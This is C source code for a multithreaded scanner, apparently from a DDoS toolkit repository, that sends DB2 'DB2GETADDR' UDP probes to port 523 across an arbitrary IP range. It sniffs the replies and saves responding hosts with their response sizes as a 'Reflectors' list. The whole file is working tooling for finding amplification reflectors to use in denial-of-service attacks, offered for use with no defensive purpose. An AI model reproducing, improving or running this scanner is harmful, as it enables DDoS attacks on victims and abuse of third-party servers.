Path: blob/master/DDOS Scripts/AMP Methods/IBM B2 Amplification/db2_scanner.c
/* DB2 Scanner, made by Bears. */12#include <pcap.h>3#include <stdio.h>4#include <stdlib.h> // for exit()5#include <string.h> //for memset6#include <sys/ioctl.h>7#include <net/if.h>8#include <sys/socket.h>9#include <arpa/inet.h> // for inet_ntoa()10#include <net/ethernet.h>11#include <netinet/udp.h> //Provides declarations for udp header12#include <netinet/ip.h> //Provides declarations for ip header13#include <pthread.h>14#include <semaphore.h>15#include <signal.h>16#include <sys/resource.h>17#include <unistd.h>18static unsigned int payloadsize = 20;19static unsigned int xport = 523;20void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);2122struct buffer23{24void *data;25int size;26struct buffer *next;27struct buffer *prev;28};29struct buffer *head;3031char *ipv4;32int processed,over,total,i,j;33struct sockaddr_in dest;34pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;35sem_t loop_sem;36int running_threads = 0;37volatile int found_srvs = 0;38volatile unsigned long per_thread = 0;39volatile unsigned long start = 0;40volatile unsigned long scanned = 0;41int sleep_between = 0;42volatile int bytes_sent = 0;43volatile unsigned long hosts_done = 0;44FILE *fd;4546void *readthread()47{48struct buffer *ourhead = head;49struct sockaddr_in saddr;50while(1)51{52sem_wait(&loop_sem);53while(ourhead->data == NULL){ ourhead = ourhead->next; }54pthread_mutex_lock(&buf_mutex);55void *buf = malloc(ourhead->size);56int size = ourhead->size;57memcpy(buf, ourhead->data, ourhead->size);58free(ourhead->data);59ourhead->data = NULL;60ourhead->size = 0;61pthread_mutex_unlock(&buf_mutex);62memset(&saddr, 0, sizeof(saddr));63struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));64saddr.sin_addr.s_addr = iph->saddr;65struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));66if(ntohs(udph->source) == xport)67{68int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);69fprintf(fd,"%s 
%d\n",inet_ntoa(saddr.sin_addr),body_length);70fflush(fd);71found_srvs++;72}73free(buf);74processed++;75ourhead = ourhead->next;76}77}7879void *flood(void *par1)80{81running_threads++;82int thread_id = (int)par1;83unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));84unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));85unsigned long w;86int y;87unsigned char buf[65536];88memcpy(buf, "\x44\x42\x32\x47\x45\x54\x41\x44\x44\x52\x00\x53\x51\x4c\x30\x35\x30\x30\x30\x00", payloadsize);89int sizeofpayload = payloadsize;90int sock;91if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {92perror("cant open socket");93exit(-1);94}95for(w=ntohl(start_ip);w<htonl(end);w++)96{97struct sockaddr_in servaddr;98bzero(&servaddr, sizeof(servaddr));99servaddr.sin_family = AF_INET;100servaddr.sin_addr.s_addr=htonl(w);101servaddr.sin_port=htons(xport);102sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));103bytes_sent+=sizeofpayload;104scanned++;105hosts_done++;106usleep(sleep_between*1000);107}108close(sock);109running_threads--;110return;111}112113void sighandler(int sig)114{115fclose(fd);116printf("\n");117exit(0);118}119120void *printthread(void *argvs)121{122char **argv = (char **)argvs;123int threads = atoi(argv[4]);124pthread_t thread;125sleep(1);126char *str_start = malloc(18);127memset(str_start, 0, 18);128str_start = argv[1];129char *str_end = malloc(18);130memset(str_end, 0, 18);131str_end = argv[2];132start = inet_addr(str_start);133per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;134unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));135int i;136for(i = 0;i<threads;i++){137pthread_create( &thread, NULL, &flood, (void *) i);138}139char *temp = (char *)malloc(17);140memset(temp, 0, 17);141sprintf(temp, "Reflectors");142printf("%-16s", temp);143memset(temp, 0, 17);144sprintf(temp, "IP/s");145printf("%-16s", temp);146memset(temp, 0, 
17);147sprintf(temp, "Bytes/s");148printf("%-16s", temp);149memset(temp, 0, 17);150sprintf(temp, "Threads");151printf("%-16s", temp);152memset(temp, 0, 17);153sprintf(temp, "%");154printf("%s", temp);155printf("\n");156157char *new;158new = (char *)malloc(16*6);159while (running_threads > 0)160{161printf("\r");162memset(new, '\0', 16*6);163sprintf(new, "%s|%-15lu", new, found_srvs);164sprintf(new, "%s|%-15d", new, scanned);165sprintf(new, "%s|%-15d", new, bytes_sent);166sprintf(new, "%s|%-15d", new, running_threads);167memset(temp, 0, 17);168int percent_done=((double)(hosts_done)/(double)(toscan))*100;169sprintf(temp, "%d%%", percent_done);170sprintf(new, "%s|%s", new, temp);171printf("%s", new);172fflush(stdout);173bytes_sent=0;174scanned = 0;175sleep(1);176}177printf("\n");178fclose(fd);179exit(0);180}181182int main(int argc, char *argv[ ])183184{185if(argc < 6){186fprintf(stderr, "Invalid parameters!\n");187fprintf(stdout, "The right fucking way: %s <1.0.0.0> <255.255.255.255> <list> <threads> <delay>\n", argv[0]);188exit(-1);189}190fd = fopen(argv[3], "a");191sleep_between = atoi(argv[5]);192int num_threads = atoi(argv[4]);193194const rlim_t kOpenFD = 1024 + (num_threads * 2);195struct rlimit rl;196int result;197rl.rlim_cur = kOpenFD;198rl.rlim_max = kOpenFD;199result = setrlimit(RLIMIT_NOFILE, &rl);200if (result != 0)201{202perror("setrlimit_nofile");203fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);204}205bzero(&rl, sizeof(struct rlimit));206rl.rlim_cur = 256 * 1024;207rl.rlim_max = 4096 * 1024;208result = setrlimit(RLIMIT_STACK, &rl);209if (result != 0)210{211perror("setrlimit_stack");212fprintf(stderr, "setrlimit_stack returned result = %d\n", result);213}214215signal(SIGINT, &sighandler);216217pcap_if_t *alldevsp;218pcap_t *handle; //Handle of the device that shall be sniffed219220char errbuf[100] , *devname , devs[100][100];221int count = 1 , n;222223if( pcap_findalldevs( &alldevsp , errbuf) )224{225exit(1);226}227228devname = 
alldevsp->name;229ipv4 = malloc(16);230bzero(ipv4, 16);231struct ifreq ifc;232int res;233int sockfd = socket(AF_INET, SOCK_DGRAM, 0);234235if(sockfd < 0) exit(-1);236strcpy(ifc.ifr_name, devname);237res = ioctl(sockfd, SIOCGIFADDR, &ifc);238close(sockfd);239if(res < 0) exit(-1);240strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));241printf("Opening device %s for sniffing ... " , devname);242handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);243244if (handle == NULL)245{246fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);247exit(1);248}249printf("Done\n");250251sem_init(&loop_sem, 0, -1);252i = 1024*1000;253while(i--)254{255if(head == NULL)256{257head = (struct buffer *)malloc(sizeof(struct buffer));258bzero(head, sizeof(struct buffer));259head->data = NULL;260head->size = 0;261head->next = head;262head->prev = head;263} else {264struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));265bzero(new_node, sizeof(struct buffer));266new_node->data = NULL;267new_node->size = 0;268new_node->prev = head;269new_node->next = head->next;270head->next = new_node;271}272}273274pthread_t prnthread;275pthread_create( &prnthread, NULL, &printthread, (void *)argv);276pthread_t redthread;277pthread_create( &redthread, NULL, &readthread, NULL);278279pcap_loop(handle , -1 , process_packet , NULL);280281return 0;282}283284void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)285{286int size = header->len;287288//Get the IP Header part of this packet , excluding the ethernet header289struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));290memset(&dest, 0, sizeof(dest));291dest.sin_addr.s_addr = iph->daddr;292293if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)294{295//toss into buffer296if(head->data != NULL) over++;297pthread_mutex_lock(&buf_mutex);298void *temp = malloc(size);299memcpy(temp, buffer, size);300head->data = temp;301head->size = size;302head = 
head->next;303pthread_mutex_unlock(&buf_mutex);304sem_post(&loop_sem);305total++;306}307}308309